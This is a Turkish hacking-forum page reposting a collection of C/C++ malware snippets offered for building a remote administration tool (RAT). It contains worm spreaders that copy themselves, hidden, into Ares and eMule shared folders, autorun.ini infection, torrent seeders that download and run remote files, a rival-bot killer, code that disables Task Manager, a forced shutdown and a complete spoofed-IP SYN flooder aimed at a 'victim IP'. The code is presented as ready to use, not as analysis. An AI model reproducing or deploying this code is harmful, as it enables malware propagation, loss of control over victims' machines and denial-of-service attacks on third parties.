Giriş yap
En iyi yollayıcılar
Hello EMO | ||||
EMO | ||||
eMoStyLe | ||||
BesimBICER | ||||
GameKinG | ||||
Crysis | ||||
~>!.DεvιLρяιεsт.!<~ | ||||
MeTaL | ||||
TrueCrime | ||||
djhayal3t |
Istatistikler
Toplam 203 kayıtlı kullanıcımız varSon kaydolan kullanıcımız: crayzboy76
Kullanıcılarımız toplam 1186 mesaj attılar bunda 862 konu
Arama
Sosyal yer imi
Sosyal bookmarking sitesinde Emo, Emo nedir, Emo resimleri, Emo Kıyafetleri, Emo Sözleri, Emo Oyunları, EmoTurkey, Emo Nickler, Emo Avatarları, Punk, Punk Resimleri, Punk Avatarları, Rock, Rock Resimleri, Rock Avatarları, Msn Nickleri, Msn Avatarları, Müzik adresi saklayın ve paylaşın
Sosyal bookmarking sitesinde EMO Style ForumPro - Hos Geldiniz adresi saklayın ve paylaşın
Kimler hatta?
Toplam 7 kullanıcı online :: 0 Kayıtlı, 0 Gizli ve 7 Misafir :: 1 Arama motorlarıYok
Sitede bugüne kadar en çok 217 kişi C.tesi Tem. 29, 2017 1:46 am tarihinde online oldu.
En son konular
Reklam
[C++] - C++ Features for you rat HUGE LIST - [SOURCE]
1 sayfadaki 1 sayfası
[C++] - C++ Features for you rat HUGE LIST - [SOURCE]
[quote='nickjonnes' pid='151309' dateline='1309350840']
hey all,
here is a compilation of source snippets that every c++ coder should have for their remote admin tool.
- SEEDERS
- SPREADERS
- DISABLE TASK MANAGER
- RC4 ENCRYPTION
- FORCE RESTART
- SYN FLOODER
hey all,
here is a compilation of source snippets that every c++ coder should have for their remote admin tool.
- SEEDERS
- Spoiler:
VUZE SEEDER- Spoiler:
- Kod:
/*
Azureus Seeder
Coded by a59
*/
#include <windows.h>
#include <stdio.h>
#include <urlmon.h>
#pragma comment( lib, "Urlmon.lib" )
int SeedAzureus( char* szLink, char* szSaveAs )
{
int i;
HWND hAzureus = FindWindow( 0, "Azureus" );
HWND hPopup, hExists;
if( hAzureus == NULL )
return 1;
if( URLDownloadToFile( 0, szLink, szSaveAs, 0, 0 ) != S_OK )
return 2;
if( (int)ShellExecute( 0, "open", szSaveAs, 0, 0, SW_NORMAL ) <= 32 )
return 3;
for( i = 0; i < 10; i++ )
{
hExists = FindWindow( 0, "Already exists" );
if( hExists != NULL )
{
ShowWindow( hExists, SW_HIDE );
return 4;
}
Sleep( 100 );
}
for( i = 0; i < 10; i++ )
{
hPopup = FindWindow( 0, "Information" );
if( hPopup != NULL )
break;
Sleep( 100 );
}
if( hPopup == NULL )
return 5;
ShowWindow( hPopup, SW_HIDE );
return 0;
};
int main( )
{
switch( SeedAzureus( "http://www.rofl.com/lol.torrent", "c:\\lol.torrent" ) )
{
case 1:
printf( "Unable to locate Azureus\n" );
break;
case 2:
printf( "Unable to download file\n" );
break;
case 3:
printf( "Unale to open file\n" );
break;
case 4:
printf( "Already seeded!\n" );
break;
case 5:
printf( "Unable to locate popup window\n" );
break;
case 0:
printf( "Seeded!\n" );
break;
}
return 0;
};
UTORRENT SEEDER- Spoiler:
- Kod:
/*
uTorrent Seeder
Coded by a59
*/
#include <windows.h>
#include <urlmon.h>
#include <stdio.h>
#pragma comment( lib, "Urlmon.lib" )
HWND uTorrentWindow = 0;
BOOL CALLBACK EnumProc( HWND hWnd, LPARAM lParam )
{
char szTitle[ 512 ];
GetWindowText( hWnd, szTitle, sizeof( szTitle ) );
if( strstr( szTitle, "\xB5Torrent" ) )
uTorrentWindow = hWnd;
return TRUE;
};
HWND FindUTorrent( )
{
EnumWindows( EnumProc, 0 );
return( uTorrentWindow );
};
void TypeString( char* szString )
{
int Length = strlen( szString ), i;
bool ShiftDown = false;
short sKey;
for( i = 0; i < Length; i++, szString++ )
{
sKey = VkKeyScan( *szString );
if( ( sKey >> 8 ) & 1 )
{
keybd_event( VK_LSHIFT, 0, 0, 0 );
ShiftDown = true;
}
keybd_event( (unsigned char)sKey, 0, 0, 0 );
if( ShiftDown )
{
keybd_event( VK_LSHIFT, 0, KEYEVENTF_KEYUP, 0 );
ShiftDown = false;
}
}
};
int SeedUTorrent( char* szUrl, char* szSaveAs, char* szSeedTo )
{
HWND uTorrentWindow = FindUTorrent( );
if( uTorrentWindow == 0 )
return 1;
if( URLDownloadToFile( 0, szUrl, szSaveAs, 0, 0 ) != S_OK )
return 2;
if( (int)ShellExecute( 0, "open", szSaveAs, 0, 0, SW_NORMAL ) <= 32 )
return 3;
ShowWindow( uTorrentWindow, SW_SHOW );
BringWindowToTop( uTorrentWindow );
SetForegroundWindow( uTorrentWindow );
SetFocus( uTorrentWindow );
if( !IsWindow( uTorrentWindow ) )
return 4;
Sleep( 300 );
if( *szSeedTo != 0 )
TypeString( szSeedTo );
keybd_event( VK_RETURN, 0, 0, 0 );
ShowWindow( uTorrentWindow, SW_MINIMIZE );
return 0;
};
int main( )
{
switch( SeedUTorrent( "http://www.shotsy.com/shotsyblog/t.torrent", "c:\\t.torrent", "c:\\lol.rar" ) )
{
case 0:
printf( "Seeded!\n" );
break;
case 1:
printf( "Unable to locate uTorrent\n" );
break;
case 2:
printf( "Unable to download file\n" );
break;
case 3:
printf( "Unable to execute file\n" );
break;
case 4:
printf( "Error with window\n" );
break;
};
return 0;
};
- SPREADERS
- Spoiler:
P2P SPREAD WITH ARES- Spoiler:
- Kod:
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders",0,KEY_READ,&hReg);
RegQueryValueEx(hReg,"Local AppData",0,0,(LPBYTE)regValue,®Lenght);
RegCloseKey(hReg);
LPSTR DefaultPath=(LPSTR)GlobalAlloc(GPTR,MAX_PATH);
lstrcat(DefaultPath,(LPSTR)regValue);
lstrcat(DefaultPath,"\\Ares\\My Shared Folder\\miBicho.exe");
//Nos copiamos al path
CopyFileA(AppName,DefaultPath,TRUE);
//Ponemos atributos de oculto, de sistema y de sólo lectura al worm
SetFileAttributesA(DefaultPath,FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM+ ?FILE_ATTRIBUTE_READONLY);
GlobalFree(DefaultPath);
}
}
GlobalFree(AppName);
GlobalFree(regValue);
//En caso de no estar Ares instalado no hacemos nada
}
P2P SPREAD WITH EMULE- Spoiler:
- Kod:
void InfectP2P()
{
_CopyMemory miCopyMemory=NULL;
miCopyMemory=(_CopyMemory)GetProcAddress(GetModuleHandle("KERNEL32.DLL"),"RtlMoveMemory");
//Obtenemos nuestra ruta
LPSTR AppName=(LPSTR)GlobalAlloc(GPTR,MAX_PATH);
GetModuleFileName(0,AppName,MAX_PATH);
DWORD dwBytes;
HKEY hReg;
DWORD regLenght=MAX_PATH*2;
PPERF_DATA_BLOCK regValue =(PPERF_DATA_BLOCK)GlobalAlloc(GPTR,regLenght);
//Comprobamos si está instalado emule
if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\eMule",0,KEY_READ,&hReg)==ERROR_SUCCESS)
{
//Obtenemos el valor de la ruta de instalación de emule
RegQueryValueEx(hReg,"Install Path",0,0,(LPBYTE)regValue,®Lenght);
RegCloseKey(hReg);
LPSTR EmulePath=(LPSTR)regValue;
lstrcat(EmulePath,"\\config\\preferences.ini");
//Obtenemos la carpeta de descargas de emule del .ini
LPSTR EmuleDownloadPath=(LPSTR)GlobalAlloc(GPTR,MAX_PATH);
GetPrivateProfileString("eMule","IncomingDir",0,EmuleDownloadPath,MAX_PATH,EmulePath);
lstrcat(EmuleDownloadPath,"\\miBicho.exe");
//Nos copiamos al path
CopyFileA(AppName,EmuleDownloadPath,TRUE);
//Ponemos atributos de oculto, de sistema y de sólo lectura al worm
SetFileAttributesA(EmuleDownloadPath,FILE_ATTRIBUTE_HIDDEN+FILE_ATTRIBUTE_SYSTEM ?+FILE_ATTRIBUTE_READONLY);
GlobalFree(EmuleDownloadPath);
GlobalFree(EmulePath);
}
GlobalFree(AppName);
GlobalFree(regValue);
}
- Spoiler:
- Kod:
/*
ReadINI/WriteINI
by: stoopid
*/
#include <windows.h>
#include <stdio.h>
int WriteINI( char* sINI, char* sFILE );
int ReadINI( char* sINI, char* sFILE );
int main()
{
if( ReadINI( "C:\\blah.ini", "blah.exe" ) == 0 ) {
if( WriteINI( "C:\\blah.ini", "blah.exe" ) == 0 ) {
printf( ">infected" );
}
}
else {
printf( "<already infected" );
}
getchar( );
return( 0 );
}
int WriteINI( char* sINI, char* sFILE )
{
bool bWrite = WritePrivateProfileString( "autorun", "open", sFILE, sINI );
if( bWrite == false ) {
return( 1 );
}
return( 0 );
}
int ReadINI( char* sINI, char* sFILE )
{
char szBuffer[260];
unsigned long lRead = GetPrivateProfileString( "autorun", "open", NULL, szBuffer, sizeof( szBuffer ), sINI );
if( lRead != 0 ) {
if( strstr( szBuffer, sFILE ) ) {
return( 1 );
}
}
return( 0 );
}
- BOT KILLER- Spoiler:
- Kod:
#include <windows.h>
#include <stdio.h>
#include <tlhelp32.h>
void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 );
void KillBot( PROCESSENTRY32 pe32 );
struct s_Search
{
char* szBot;
char* szString;
};
s_Search sSearch[ ] =
{
{ "VNC Scanning Bot", "\x52\x46\x42\x20\x30\x30\x33\x2E\x30\x30\x38\x0A" },
{ "RXBot", "[MAIN]" },
{ "RXBot", "[SCAN]" },
{ "RXBot", "[FTP]" },
{ " Cerberus", "Main" },
{ "Apocalypse RAT", "Main" },
{ "Solitude RAT", "Main" },
{ "xviscera RAT", "Main" },
{ "BfBot", "" }",
{ "Albertino's RAT", "Main" },
{ "DarkComet-RAT", "Main" },
{ "Deeper RAT", "Main" },
{ "Shit Stealer", "host" },
{ "Poison Ivy", "steal" },
{ "Fallen Bot", "xor" },
{ "Spy-Net", "Spy-net" },
{ "CyberGate", "Port" },
{ "Outbreak Bot", "Accepted" },
{ "Warbot", "UDP" },
{ "NesBot", "Accepted" },
{ "DDoSer", "UDP" }",
{ "MeTuS", "Connections" },
{ "KyleBot", "MSN" },
{ "TsGh v8", "Wrong" },
{ "iRTehStealer", "URL" },
{ "IMbot", "::[MAIN]::" },
{ "kBot", "Ready Boss" }",
{ "Plague Bot", "Accepted" },
{ "iSwarm Bot", "Accepted" },
{ "s0lar Bot", "Wrong" },
{ "Logik Bot", "Accepted" },
{ "iStealer", "Main" }",
{ "Hidden Iye Keylogger", "" },
{ "SkuLogger", "" }",
{ "Albertino's Keylogger", "" },
{ "Armadax", "Main" },
{ "StealthKeys", "Main" },
{ "KeyController", "Main" },
{ "FlyLogger", "Main" },
{ "StormBot", "encrypt" },
{ "bot1", "MS08" },
{ "bot2", "MS10" },
{ "XP", "[XP" },
{ "VIS", "[VIS" },
{ "7", "[7" },
{ "wi7", "[W7" },
{ "wind7", "[WI7" },
{ "usa", "[USA|" },
{ "svn", "[SVN|" },
{ "deu", "[DEU|" },
{ "can", "[CAN|" },
{ "nld", "[NLD|" },
{ "zaf", "[ZAF|" },
{ "gbr", "[GBR|" },
{ "isr", "[ISR|" },
{ "ils", "[ILS|" },
{ "bra", "[BRA|" },
{ "fra", "[FRA|" },
{ "aus", "[AUS|" },
{ "swe", "[SWE|" },
{ "Unknown", "&echo bye" },
{ NULL, NULL }
};
void DoSearch( unsigned long uStartAddr, unsigned long uEndAddr, PROCESSENTRY32 pe32 )
{
char szBigBuffer[ 0x5000 ] = { 0 };
unsigned char Curbuf[ 0x500 ] = { 0 };
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
printf( "Scanning PID: %d [ %s ]\nStart Address: 0x%08X End Address: 0x%08X\n\n", pe32.th32ProcessID, pe32.szExeFile, uStartAddr, uEndAddr );
for( unsigned long uCurAddr = uStartAddr; uCurAddr <= uEndAddr; uCurAddr++ )
{
BOOL bRead = ReadProcessMemory( hProcess, (void *)uCurAddr, (void *)&Curbuf, sizeof( Curbuf ), NULL );
if( bRead )
{
int c = 0;
strcat( szBigBuffer, (char *)Curbuf );
while( sSearch[ c ].szString != NULL )
{
if( strstr( szBigBuffer, sSearch[ c ].szString ) )
{
printf( "Found string \"%s\" in \"%s\" bot \"%s\"\n\n", sSearch[ c ].szString, pe32.szExeFile, sSearch[ c ].szBot );
KillBot( pe32 );
}
c++;
}
if( sizeof( szBigBuffer ) > 0x150 )
ZeroMemory( szBigBuffer, sizeof( szBigBuffer ) );
}
if( !bRead )
break;
}
CloseHandle( hProcess );
};
void KillBot( PROCESSENTRY32 pe32 )
{
MODULEENTRY32 me32 = { 0 };
HANDLE hPath = CreateToolhelp32Snapshot( TH32CS_SNAPMODULE, pe32.th32ProcessID );
HANDLE hKillProcess;
me32.dwSize = sizeof( me32 );
BOOL bRetval = Module32First( hPath, &me32 );
while( bRetval )
{
if( !strcmp( pe32.szExeFile, me32.szModule ) )
{
SetFileAttributes( me32.szExePath, FILE_ATTRIBUTE_NORMAL );
hKillProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID );
TerminateProcess( hKillProcess, 0 );
Sleep( 500 );
if( DeleteFile( me32.szExePath ) )
printf( "Terminated and deleted %s\n", me32.szExePath );
}
bRetval = Module32Next( hPath, &me32 );
}
CloseHandle( hKillProcess );
CloseHandle( hPath );
};
int main( )
{
char szFile[ 128 ];
GetModuleFileName( GetModuleHandle( NULL ), szFile, sizeof( szFile ) );
char* szBlockList[ ] = { "explorer.exe", "hidserv.exe", "WINLOGON.EXE", "SERVICES.EXE", szFile };
HANDLE hProcess = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof( PROCESSENTRY32 );
BOOL bRetval = Process32First( hProcess, &pe32 );
bool bDoSearch = true;
while( bRetval )
{
Sleep( 250 );
for( int i = 0; i < ( sizeof( szBlockList ) / sizeof( char* ) ); i++ )
{
if( strstr( szBlockList[ i ], pe32.szExeFile ) )
bDoSearch = false;
}
if( bDoSearch )
{
DoSearch( 0x00400000, 0x004FFFFF, pe32 );
DoSearch( 0x00100000 ,0x001FFFFF, pe32 );
}
else
bDoSearch = true;
bRetval = Process32Next( hProcess, &pe32 );
}
CloseHandle( hProcess );
printf( "Done scanning, press ENTER to exit this program.\n" );
getchar( );
return 0;
};
- OPEN CD-ROM- Spoiler:
- Kod:
Link with winmm.lib to make it work.
For Dev-cpp go Project>>Project option>>Parameters>>Add library>>libwinmm.a
This snippet opens the door of the CD-ROM.
==========================================================
#include <iostream>
#include <windows.h> // Sleep()
#include <mmsystem.h> // mciSendString()
using namespace std;
int main()
{
mciSendString("open CDAudio", NULL, 0, NULL);
mciSendString("set CDAudio door open", NULL, 0, NULL);//Open the door
Sleep(1000);
mciSendString("set CDAudio door closed", NULL, 0, NULL);//Close the door
mciSendString("close CDAudio", NULL, 0, NULL);
return 0;
}
- DISABLE TASK MANAGER
- Spoiler:
- Kod:
// Disable your task manager. To enable it again, download this registry file.
#include <windows.h>
int main()
{
DWORD dwVal = 1;
HKEY hKey;
RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, KEY_ALL_ACCESS, &hKey);
RegSetValueEx (hKey, "DisableTaskmgr", 0, REG_DWORD, (LPBYTE)&dwVal , sizeof(DWORD));
RegCloseKey(hKey);
return 0;
}
- RC4 ENCRYPTION
- Spoiler:
- Kod:
void rc4(unsigned char * ByteInput, unsigned char * pwd,
unsigned char * &ByteOutput){
unsigned char * temp;
int i,j=0,t,tmp,tmp2,s[256], k[256];
for (tmp=0;tmp<256;tmp++){
s[tmp]=tmp;
k[tmp]=pwd[(tmp % strlen((char *)pwd))];
}
for (i=0;i<256;i++){
j = (j + s[i] + k[i]) % 256;
tmp=s[i];
s[i]=s[j];
s[j]=tmp;
}
temp = new unsigned char [ (int)strlen((char *)ByteInput) + 1 ] ;
i=j=0;
for (tmp=0;tmp<(int)strlen((char *)ByteInput);tmp++){
i = (i + 1) % 256;
j = (j + s[i]) % 256;
tmp2=s[i];
s[i]=s[j];
s[j]=tmp2;
t = (s[i] + s[j]) % 256;
if (s[t]==ByteInput[tmp])
temp[tmp]=ByteInput[tmp];
else
temp[tmp]=s[t]^ByteInput[tmp];
}
temp[tmp]='';
ByteOutput=temp;
}
- FORCE RESTART
- Spoiler:
- Kod:
// Simple program which restart your computer in 10 seconds.
#include <iostream>
using namespace std;
int main ()
{
system("shutdown -s -t 10");
system("PAUSE");
return 0;
}
- SYN FLOODER
- Spoiler:
- Kod:
/**
* SYN flooder , practice #2 for raw sockets.
* Author: acidh4cks.
* Date: 05/09/2009
*
* This was made only for educational purposes.
* I get rid of all kind of responsabilities.
*
* USE AT YOUR OWN RISK
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <getopt.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
void showHelp(char *name);
unsigned short checksum(unsigned short *addr, int len);
u_long resolve(char *hostname);
int main(int argc, char **argv)
{
int sockfd;
int argument;
int times = 1;
int packet_size = (sizeof(struct iphdr)+sizeof(struct tcphdr));
int verbose;
int i;
char tcpPacket[packet_size];
char *spoofedIP = NULL;
char *victimIP = NULL;
struct sockaddr_in connection;
struct tcphdr *tcp;
struct iphdr *ip;
//TODO: Make it functional.
verbose = 0;
if (getuid() != 0) {
fprintf(stderr, "%s: root priviledges needed\n", argv[0]);
return -1;
}
//Capturing parameters
while ((argument = getopt(argc, argv, "hvs:d:")) != -1) {
switch(argument) {
case 'h':
showHelp(argv[0]);
return -1;
break;
case 'v':
verbose = 1;
break;
case 's':
spoofedIP = optarg;
break;
case 'd':
victimIP = optarg;
break;
case '?':
if ((optopt == 's') || (optopt == 'd')) {
fprintf (stderr, "Option -%c requires an argument.\n", optopt);
}else {
fprintf (stderr, "Unknown option character %x.\n", optopt);
}
default:
return -1;
}
}
//The -s parameter is required.
if (spoofedIP == NULL) {
printf("You must specify the spoofed IP address. Type %s -h for help.\n\n", argv[0]);
return -1;
}
//The -d parameter is required.
if (victimIP == NULL) {
printf("You must specify victim's IP address. Type %s -h for help.\n\n", argv[0]);
return -1;
}
printf("Spoofed IP: %s\n", spoofedIP);
printf("Victim IP: %s\n", victimIP);
//Creating the socket.
if ((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
printf("ERROR: Could not create socket, reason: %s\n\n", strerror(errno));
return -1;
}
//Setting the pointers.
ip = (struct iphdr *)tcpPacket;
tcp = (struct tcphdr *) (tcpPacket + sizeof(struct iphdr));
//Filling IP header (the checksum is left for later).
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->tot_len = htons(packet_size);
ip->id = random();
ip->frag_off = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_TCP;
ip->saddr = inet_addr(spoofedIP);
ip->daddr = inet_addr(victimIP);
//Filling TCP header.
tcp->source = htons(6969);
tcp->dest = htons(80);
tcp->seq = random();
tcp->ack_seq = 0;
tcp->doff = 5;
tcp->fin = 0;
tcp->syn = 1;
tcp->rst = 0;
tcp->psh = 0;
tcp->ack = 0;
tcp->urg = 0;
tcp->res1 = 0;
tcp->res2 = 0;
tcp->window = htons(65535);
tcp->urg_ptr = 0;
//IP checksum (have to be calculated once the tcp header is full).
tcp->check = 0;
ip->check = checksum((unsigned short *)ip, packet_size);
connection.sin_family = AF_INET;
connection.sin_addr.s_addr = inet_addr(victimIP);
printf("Performing attack... control-c to stop\n\n");
//Now sending
for (;;) {
if (sendto(sockfd, tcpPacket, packet_size, 0, (struct sockaddr *)&connection, sizeof(struct sockaddr)) < 0) {
printf("ERROR: Could not send data, reason: %s\n\n", strerror(errno));
return -1;
}
}
return 0;
}
void showHelp(char *name)
{
printf("Usage: %s [-h] [-v] -s victimIP -d bcastIP [-t times]\n", name);
printf(" -h Show this help.\n");
printf(" -v Verbose mode.\n");
printf(" -s Spoofed IP address.\n");
printf(" -d Target IP address.\n\n");
}
unsigned short checksum(unsigned short *addr, int len)
{
unsigned long sum;
for (sum = 0; len > 0; len--)
sum += *addr++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return ~sum;
}
Similar topics
» Drop List Maker [ Otomatik Drop Listesi ] + [ Source ]
» [Source] Great D3D Crosshair source
» [Source C++ 1.15] Uhack Source code
» [1.310/1.351/2.0] Friend List Overflow Bug Fix
» cs 1.6 server list editor
» [Source] Great D3D Crosshair source
» [Source C++ 1.15] Uhack Source code
» [1.310/1.351/2.0] Friend List Overflow Bug Fix
» cs 1.6 server list editor
1 sayfadaki 1 sayfası
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz
Cuma Ağus. 29, 2014 8:33 am tarafından Hello EMO
» goldenchase.net maden yaparak para kazanma
Cuma Ağus. 29, 2014 8:18 am tarafından Hello EMO
» etichal hacker görsel egitim seti
Çarş. Ağus. 06, 2014 4:57 am tarafından Hello EMO
» KO TBL Source C#
Ptsi Ara. 09, 2013 6:36 am tarafından Hello EMO
» x86 Registers
C.tesi Ağus. 24, 2013 5:02 am tarafından Hello EMO
» [Tutorial] Pegando Address, Pointers de WYD
Çarş. Tem. 10, 2013 7:25 am tarafından Hello EMO
» [Tutorial] Pegando Address, Pointers de CS Metodo²
Çarş. Tem. 10, 2013 7:23 am tarafından Hello EMO
» [Tutorial] Aprendendo basico deASM OLLYDBG
Çarş. Tem. 10, 2013 7:22 am tarafından Hello EMO
» Basic C# DLL injector
Ptsi Tem. 08, 2013 7:48 am tarafından Hello EMO